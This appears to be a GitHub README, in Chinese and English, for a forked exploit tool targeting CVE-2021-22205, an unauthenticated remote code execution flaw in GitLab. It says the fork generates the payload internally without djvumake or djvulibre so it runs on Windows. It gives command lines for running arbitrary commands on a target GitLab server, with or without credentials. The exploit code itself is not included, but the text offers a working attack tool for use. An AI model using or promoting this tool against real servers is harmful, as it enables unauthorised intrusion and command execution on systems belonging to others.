
CVE-2021-22205 Gitlab 未授权远程代码执行漏洞 EXP, 移除了对djvumake & djvulibre的依赖,可在win平台使用
Fork of mr-r3bot/Gitlab-CVE-2021-22205
CVE-2021-22205: GitLab Unauthenticated Remote Code Execution Vulnerability Exploit
Removed the dependency on djvumake & djvulibre, directly generates payload internally, can be executed on Windows platform.
# 需要授权
python3 exploit.py -u <username> -p <password> -t <gitlab_url> -c <command>
# 未授权
python3 exploit.py -t <gitlab_url> -c <command>